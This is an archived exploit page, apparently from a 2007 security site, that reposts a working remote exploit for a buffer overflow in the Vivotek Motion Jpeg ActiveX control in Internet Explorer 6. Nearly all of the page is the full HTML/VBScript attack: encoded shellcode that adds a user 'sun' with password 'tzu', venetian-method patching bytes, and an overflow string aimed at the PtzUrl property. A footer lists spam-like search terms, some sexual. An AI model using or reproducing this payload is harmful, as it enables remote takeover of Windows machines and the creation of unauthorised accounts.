about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13) Remote Exploit




2007-06-03 Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13) Remote Exploit 
Rated as : High Risk

<!-- IE 6 / Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13)
remote buffer overflow exploit / win 2k sp4 en version
by rgod
site: retrogod.altervista.org

software site: http://www.vivotek.com/
"VIVOTEK INC. is a leading IP surveillance camera and Network
camera firm specialized in IP camera, Wireless network camera,
IP surveillance camera"

some notes,
PtzUrl property is vulnerable to a stack based buffer overflow
we are in control of EIP, ESI, EDI, EBP , *all* in UNICODE
expanded strings
I used the "venetian method" to fully patch the shellcode
This works from remote (2 on 3) or by dragging the html file
into the browser window, not by clicking it

Object safety report:

RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
-->
<HTML>
<OBJECT classid='clsid:EAA105FE-7BBD-4196-8B96-D46743894195'
id='MjpegControl' ></OBJECT>
<script language='vbscript'>

' metasploit one, alpha2... add a user 'sun' with pass 'tzu'
FRAGMENT =
unescape("%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%71%40%71%40%71%40%71%40%71%40%72%40%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%eb%59%05%f8%ff%49%49%49%49%49%49%49%49%49%51%6a%58%30%31%42%42%78%42%42%41%30%41%50%42%75%39%6c%48%44%70%70%50%4b%35%6c%4b%6c%65%58%31%6f%4b%6f%38%4b%4f%70%61%6b%69%6b%34%6b%51%6e%31%70%79%6c%64%30%64%37%31%7a%4d%51%72%6b%54%4b%34%44%64%65%45%6b%4f%44%31%6b%66%4b%6c%6b%4b%6f%4c%71%4b%4b%4c%6b%51%4b%79%6c%54%74%73%61%50%64%4b%70%50%75%70%58%6c%4b%50%6c%6b%50%6c%4d%6b%38%48%4b%79%6b%30%50%70%30%70%4b%78%4c%6f%41%46%50%46%69%58%53%70%6b%50%48%6e%38%72%53%38%78%4e%6a%4e%37%6f%47%73%6d%44%4e%35%38%45%50%6f%43%30%4e%45%34%30%55%33%75%42%70%43%65%4e%50%54%58%35%70%4f%61%44%34%50%56%56%50%4e%55%64%50%6c%6f%63%51%4c%47%72%6f%75%70%30%71%44%6d%49%6e%79%73%74%62%41%64%6f%62%63%50%33%65%4e%50%6f%71%34%74%50%c3")

c1 = unescape("%95")                : REM xchg eax, ebp
C2 = unescape("%6e%05%ff%02")       : REM add eax 0200ff00h
C3 = unescape("%6e%2d%12%02")       : REM sub eax 02001200h
C4 = unescape("%6e%40%6e")          : REM inc eax
C5 = unescape("%80%90%6e%40%6e%40") : REM add byte ptr eax 90 ,
inc eax twice
C6 = unescape("%6e%80%90%6e%40%6e%40") : REM and again ... add
byte ptr esi works as nop

CODE = C1 & C2 & C3 & C4 & C5 & C6 & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%03%6e%40%6e%40") & _
unescape("%6e%80%eb%6e%40%6e%40%6e%80%e8%6e%40%6e%40") & _
unescape("%6e%80%ff%6e%40%6e%40%6e%80%ff%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%37%6e%40%6e%40%6e%80%5a%6e%40%6e%40") & _
unescape("%6e%80%68%6e%40%6e%40%6e%80%50%6e%40%6e%40") & _
unescape("%6e%80%41%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%41%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%38%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%6d%6e%40%6e%40%6e%80%69%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%35%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%55%6e%40%6e%40") & _
unescape("%6e%80%4c%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%46%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%33%6e%40%6e%40%6e%80%48%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%75%6e%40%6e%40") & _
unescape("%6e%80%76%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%52%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%6b%6e%40%6e%40") & _
unescape("%6e%80%4e%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%6f%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%6f%6e%40%6e%40%6e%80%4b%6e%40%6e%40") & _
unescape("%6e%80%44%6e%40%6e%40%6e%80%65%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%38%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%76%6e%40%6e%40") & _
unescape("%6e%80%56%6e%40%6e%40%6e%80%51%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%66%6e%40%6e%40") & _
unescape("%6e%80%43%6e%40%6e%40%6e%80%48%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%62%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%7a%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%4a%6e%40%6e%40") & _
unescape("%6e%80%4f%6e%40%6e%40%6e%80%43%6e%40%6e%40") & _
unescape("%6e%80%77%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%55%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%43%6e%40%6e%40") & _
unescape("%6e%80%66%6e%40%6e%40%6e%80%6f%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%66%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%46%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%45%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%7a%6e%40%6e%40") & _
unescape("%6e%80%37%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%53%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%47%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%73%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%6a%6e%40%6e%40%6e%80%4d%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%30%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%64%6e%40%6e%40%6e%80%46%6e%40%6e%40") & _
unescape("%6e%80%59%6e%40%6e%40%6e%80%7a%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%66%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%64%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%72%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%74%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%74%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%35%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%72%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%65%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%37%6e%40%6e%40") & _
unescape("%6e%80%77%6e%40%6e%40%6e%80%37%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%31%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%73%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%30%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%42%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%50%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%74%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%64%6e%40%6e%40%6e%80%53%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%63%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%90%6e%40%6e%40%6e%40%6e")

bof         = string(262,unescape("%12"))
useful_junk = unescape("%12%12%12%12") 'not touch
junk        = string(32,unescape("%12"))
eip         = unescape("%23%7d") : REM 0x007d0023   call edi, 
module comctl32 found with msfpescan
suntzu      = bof + eip + useful_junk + junk + CODE + FRAGMENT +
string(16,unescape("%90"))

MjpegControl.PtzUrl = suntzu

</script>
</HTML>


securitydot.net - 2007-06-03

Advertising

Copyright 2007, SecurityDot
Sat, 04 Jul 2009 22:35:08 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sexyvido hindi six Sexypohto/ xxx.sex ve mujer epa Dolphin Sm videosarah www.indian Serv-U ftp modernbill Gameas Www.india blue flim Xxxindianx z.../ext/r Adultparty 782 AllMyGuest Vidio sear VAGINA-IND youporrne Ww.my1.my. bot irc Www.Sabah. wwwsixcom Crack Data t827t Trisha sex www.titan. solaris 10 sleeping m titt windows 20 joomla exp Bangladesh Xxxindianx sex hindi. teluguanti www.836160 Retrospect Pleboy xx nude photo WWW.SEXPHO phpbb2.0.6 vBullitein sexy narut bollywood sex+picter WWW.IRANXI SANIYA MIR